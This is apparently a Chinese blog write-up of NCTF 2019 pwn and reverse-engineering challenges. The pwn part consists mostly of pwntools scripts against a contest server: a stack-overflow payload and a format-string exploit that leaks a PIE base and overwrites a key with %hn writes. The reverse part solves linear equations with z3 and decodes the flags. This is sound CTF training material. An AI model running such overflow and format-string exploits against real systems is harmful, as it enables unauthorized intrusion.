获取中...

-

Just a minute...

南邮的几道逆向和pwn

pwn

hello_pwn

接收一下就好了

1
2
3
from pwn import *
p=remote('139.129.76.65','50003')
p.recv()

nNCTF{hell0__play}

pwn me 100 years! (Ⅰ)

简单的溢出,偏移可直接看出是12,最后是ffff

1
2
3
4
5
from pwn import *
p=remote('139.129.76.65','50004')
payload='yes\0'+'a'*12+'ffff'
p.sendline(payload)
p.interactive()

NCTF{PWN_100ye4rs_2333!}

pwn me 100 years! (Ⅱ)

格式化字符串漏洞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
from pwn import *
import sys
p = remote("139.129.76.65","50005")
def exec_fmt(payload):
p = process("./pwn_me_2")
p.recvuntil("but your name:")
p.sendline("lihaoyu")
p.recvuntil("what do you want?")
p.sendline(payload)
p.recvline()
info = sh.recv()
p.close()
return info
p.recvuntil("but your name:")
p.sendline("A"*0x10+'%p')
p.recvuntil("preparing......\x0a0x")
pie_addr=int(p.recvuntil('\x0a').strip('\x0a'),16)-0x202080
log.success("PIE addr is "+str(hex(pie_addr)))
Key_string=pie_addr+0x2020E0
payload = "%" + str(0x6666) + "c%9$hn%10$hn"
payload = payload.ljust(0x18,"\x00")
payload += p64(Key_string) + p64(Key_string+2)
p.recvuntil("what do you want?")
p.sendline(payload)
p.interactive()

NCTF{rrr_loves_pwn_and_100years}

re

DEBUG

用ida远程调试,再GG和win前下断电,一步步调,之后可以看到24个字符

1
2
3
a = [0x4e, 0x43, 0x54, 0x46, 0x7b, 0x6a, 0x75,0x73,0x74,0x5f, 0x64, 0x65, 0x62, 0x75, 0x67, 0x5f, 0x69, 0x74, 0x5f, 0x32, 0x33, 0x33, 0x33, 0x7d]
for i in a:
print(chr(i),end='')

签到题

程序给了方程,用z3求解

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
from z3 import *
a1=[]
for i in range(49):
a1.append(Int('a1['+str(i)+']'))
solver = Solver()
solver.add(34 * a1[3] + 12 * a1[0] + 53 * a1[1] + 6 * a1[2] + 58 * a1[4] + 36 * a1[5] + a1[6] == 0x00004884)
solver.add(27 * a1[4] + 73 * a1[3] + 12 * a1[2] + 83 * a1[0] + 85 * a1[1] + 96 * a1[5] + 52 * a1[6] == 0x000091C4)
solver.add(24 * a1[2] + 78 * a1[0] + 53 * a1[1] + 36 * a1[3] + 86 * a1[4] + 25 * a1[5] + 46 * a1[6] == 0x00007D35)
solver.add(78 * a1[1] + 39 * a1[0] + 52 * a1[2] + 9 * a1[3] + 62 * a1[4] + 37 * a1[5] + 84 * a1[6] == 0x000081FE)
solver.add(48 * a1[4] + 6 * a1[1] + 23 * a1[0] + 14 * a1[2] + 74 * a1[3] + 12 * a1[5] + 83 * a1[6] == 0x00005DB9)
solver.add(15 * a1[5] + 48 * a1[4] + 92 * a1[2] + 85 * a1[1] + 27 * a1[0] + 42 * a1[3] + 72 * a1[6] == 0x0000817F)
solver.add(26 * a1[5] + 67 * a1[3] + 6 * a1[1] + 4 * a1[0] + 3 * a1[2] + 68 * a1[6] == 0x00003B90)
solver.add(34 * a1[10] + 12 * a1[7] + 53 * a1[8] + 6 * a1[9] + 58 * a1[11] + 36 * a1[12] + a1[13] == 0x00003597 )
solver.add(27 * a1[11] + 73 * a1[10] + 12 * a1[9] + 83 * a1[7] + 85 * a1[8] + 96 * a1[12] + 52 * a1[13] == 0x00008559)
solver.add(24 * a1[9] + 78 * a1[7] + 53 * a1[8] + 36 * a1[10] + 86 * a1[11] + 25 * a1[12] + 46 * a1[13] == 0x00006aff)
solver.add(78 * a1[8] + 39 * a1[7] + 52 * a1[9] + 9 * a1[10] + 62 * a1[11] + 37 * a1[12] + 84 * a1[13] == 0x00006fdf)
solver.add(48 * a1[11] + 6 * a1[8] + 23 * a1[7] + 14 * a1[9] + 74 * a1[10] + 12 * a1[12] + 83 * a1[13] == 0x00004815)
solver.add(15 * a1[12] + 48 * a1[11] + 92 * a1[9] + 85 * a1[8] + 27 * a1[7] + 42 * a1[10] + 72 * a1[13] == 0x00006f31)
solver.add(26 * a1[12] + 67 * a1[10] + 6 * a1[8] + 4 * a1[7] + 3 * a1[9] + 68 * a1[13] == 0x00003060)
solver.add(34 * a1[17] + 12 * a1[14] + 53 * a1[15] + 6 * a1[16] + 58 * a1[18] + 36 * a1[19] + a1[20] == 0x0000512C)
solver.add(27 * a1[18] + 73 * a1[17] + 12 * a1[16] + 83 * a1[14] + 85 * a1[15] + 96 * a1[19] + 52 * a1[20] == 0x0000B01D)
solver.add(24 * a1[16] + 78 * a1[14] + 53 * a1[15] + 36 * a1[17] + 86 * a1[18] + 25 * a1[19] + 46 * a1[20] ==0x00008BF3)
solver.add(78 * a1[15] + 39 * a1[14] + 52 * a1[16] + 9 * a1[17] + 62 * a1[18] + 37 * a1[19] + 84 * a1[20] ==0x0000917B)
solver.add(48 * a1[18] + 6 * a1[15] + 23 * a1[14] + 14 * a1[16] + 74 * a1[17] + 12 * a1[19] + 83 * a1[20] ==0x000065B5)
solver.add(15 * a1[19] + 48 * a1[18] + 92 * a1[16] + 85 * a1[15] + 27 * a1[14] + 42 * a1[17] + 72 * a1[20] == 0x000099F1)
solver.add(26 * a1[19] + 67 * a1[17] + 6 * a1[15] + 4 * a1[14] + 3 * a1[16] + 68 * a1[20] ==0x000044AF)
solver.add(34 * a1[24] + 12 * a1[21] + 53 * a1[22] + 6 * a1[23] + 58 * a1[25] + 36 * a1[26] + a1[27] ==0x00005159)
solver.add(27 * a1[25] + 73 * a1[24] + 12 * a1[23] + 83 * a1[21] + 85 * a1[22] + 96 * a1[26] + 52 * a1[27]==0x0000ADBA)
solver.add(24 * a1[23] + 78 * a1[21] + 53 * a1[22] + 36 * a1[24] + 86 * a1[25] + 25 * a1[26] + 46 * a1[27]==0x00008942)
solver.add(78 * a1[22] + 39 * a1[21] + 52 * a1[23] + 9 * a1[24] + 62 * a1[25] + 37 * a1[26] + 84 * a1[27] ==0x00009032)
solver.add(48 * a1[25] + 6 * a1[22] + 23 * a1[21] + 14 * a1[23] + 74 * a1[24] + 12 * a1[26] + 83 * a1[27] == 0x0000653E)
solver.add(15 * a1[26] + 48 * a1[25] + 92 * a1[23] + 85 * a1[22] + 27 * a1[21] + 42 * a1[24] + 72 * a1[27] == 0x00009803)
solver.add(26 * a1[26] + 67 * a1[24] + 6 * a1[22] + 4 * a1[21] + 3 * a1[23] + 68 * a1[27]==0x00004508)
solver.add(34 * a1[31] + 12 * a1[28] + 53 * a1[29] + 6 * a1[30] + 58 * a1[32] + 36 * a1[33] + a1[34]==0x000052E3)
solver.add(27 * a1[32] + 73 * a1[31] + 12 * a1[30] + 83 * a1[28] + 85 * a1[29] + 96 * a1[33] + 52 * a1[34]==0x0000AB9F)
solver.add(24 * a1[30] + 78 * a1[28] + 53 * a1[29] + 36 * a1[31] + 86 * a1[32] + 25 * a1[33] + 46 * a1[34]==0x000090D0)
solver.add(78 * a1[29] + 39 * a1[28] + 52 * a1[30] + 9 * a1[31] + 62 * a1[32] + 37 * a1[33] + 84 * a1[34]==0x000099BF)
solver.add(48 * a1[32] + 6 * a1[29] + 23 * a1[28] + 14 * a1[30] + 74 * a1[31] + 12 * a1[33] + 83 * a1[34]==0x00006C91)
solver.add(15 * a1[33] + 48 * a1[32] + 92 * a1[30] + 85 * a1[29] + 27 * a1[28] + 42 * a1[31] + 72 * a1[34]==0x0000A1E7)
solver.add(26 * a1[33] + 67 * a1[31] + 6 * a1[29] + 4 * a1[28] + 3 * a1[30] + 68 * a1[34]==0x000046B2)
solver.add(34 * a1[38] + 12 * a1[35] + 53 * a1[36] + 6 * a1[37] + 58 * a1[39] + 36 * a1[40] + a1[41]==0x00005357)
solver.add(27 * a1[39] + 73 * a1[38] + 12 * a1[37] + 83 * a1[35] + 85 * a1[36] + 96 * a1[40] + 52 * a1[41]==0x0000b454)
solver.add(24 * a1[37] + 78 * a1[35] + 53 * a1[36] + 36 * a1[38] + 86 * a1[39] + 25 * a1[40] + 46 * a1[41]==0x0000972A)
solver.add(78 * a1[36] + 39 * a1[35] + 52 * a1[37] + 9 * a1[38] + 62 * a1[39] + 37 * a1[40] + 84 * a1[41]==0x000098AC)
solver.add(48 * a1[39] + 6 * a1[36] + 23 * a1[35] + 14 * a1[37] + 74 * a1[38] + 12 * a1[40] + 83 * a1[41]==0x00007215)
solver.add(15 * a1[40] + 48 * a1[39] + 92 * a1[37] + 85 * a1[36] + 27 * a1[35] + 42 * a1[38] + 72 * a1[41]==0x00009FD1)
solver.add(26 * a1[40] + 67 * a1[38] + 6 * a1[36] + 4 * a1[35] + 3 * a1[37] + 68 * a1[41]== 0x00004AAD)
solver.add(34 * a1[45] + 12 * a1[42] + 53 * a1[43] + 6 * a1[44] + 58 * a1[46] + 36 * a1[47] + a1[48]==0x0000551A)
solver.add(27 * a1[46] + 73 * a1[45] + 12 * a1[44] + 83 * a1[42] + 85 * a1[43] + 96 * a1[47] + 52 * a1[48]==0x0000B5ED)
solver.add(24 * a1[44] + 78 * a1[42] + 53 * a1[43] + 36 * a1[45] + 86 * a1[46] + 25 * a1[47] + 46 * a1[48]==0x000095B2)
solver.add(78 * a1[43] + 39 * a1[42] + 52 * a1[44] + 9 * a1[45] + 62 * a1[46] + 37 * a1[47] + 84 * a1[48]==0x0000A039)
solver.add(48 * a1[46] + 6 * a1[43] + 23 * a1[42] + 14 * a1[44] + 74 * a1[45] + 12 * a1[47] + 83 * a1[48]==0x00007272)
solver.add(15 * a1[47] + 48 * a1[46] + 92 * a1[44] + 85 * a1[43] + 27 * a1[42] + 42 * a1[45] + 72 * a1[48]==0x0000A991)
solver.add(26 * a1[47] + 67 * a1[45] + 6 * a1[43] + 4 * a1[42] + 3 * a1[44] + 68 * a1[48]==0x00004CC7)
print(solver.check())
print(solver.model())

像这多组求解结果排序转字符

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
#include <iostream>
using namespace std;

int main()
{
int a1[49];
a1[14] = 108;
a1[25] = 98;
a1[43] = 115;
a1[0] = 78;
a1[15] = 105;
a1[37] = 105;
a1[36] = 95;
a1[7] = 116;
a1[16] = 110;
a1[45] = 105;
a1[23] = 103;
a1[47] = 103;
a1[18] = 97;
a1[30] = 115;
a1[28] = 95;
a1[2] = 84;
a1[4] = 123;
a1[3] = 70;
a1[21] = 97;
a1[24] = 101;
a1[29] = 105;
a1[17] = 101;
a1[22] = 108;
a1[31] = 95;
a1[33] = 101;
a1[38] = 110;
a1[11] = 49;
a1[26] = 114;
a1[39] = 116;
a1[8] = 102;
a1[10] = 48;
a1[40] = 101;
a1[42] = 101;
a1[44] = 116;
a1[19] = 114;
a1[46] = 110;
a1[12] = 57;
a1[32] = 118;
a1[1] = 67;
a1[35] = 121;
a1[5] = 110;
a1[9] = 50;
a1[48] = 125;
a1[41] = 114;
a1[34] = 114;
a1[27] = 97;
a1[20] = 95;
a1[13] = 95;
a1[6] = 99;
for(int i = 0; i <= 48; ++i)
cout<<(char)a1[i];
return 0;
}

NCTF{nctf2019_linear_algebra_is_very_interesting}

相关文章
评论
分享
  • 网鼎杯部分wp

    pwnboom1分析远程已经打不通了,远程的偏移和本地的偏移不一样,只能复现一下本地的了。 首先看到流程图,代码量很大,有很大的switch语句和嵌套结构,可能是虚拟机或者是解析器。 从下图看出是一个C语言的解析器。 然后看了...

    网鼎杯部分wp
  • 数字中国创新大赛

    又是自闭的一天。。 game这一题是关于python字节码的题目,之前没有了解过,看了几篇关于python字节码的文章,死磕,手工还原。。 python字节码 12345678910111213141516171819202122...

    数字中国创新大赛
  • hitcontraining_uaf

    一道简单的uaf的题目 保护12345Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX...

    hitcontraining_uaf
Please check the parameter of comment in config.yml of hexo-theme-Annie!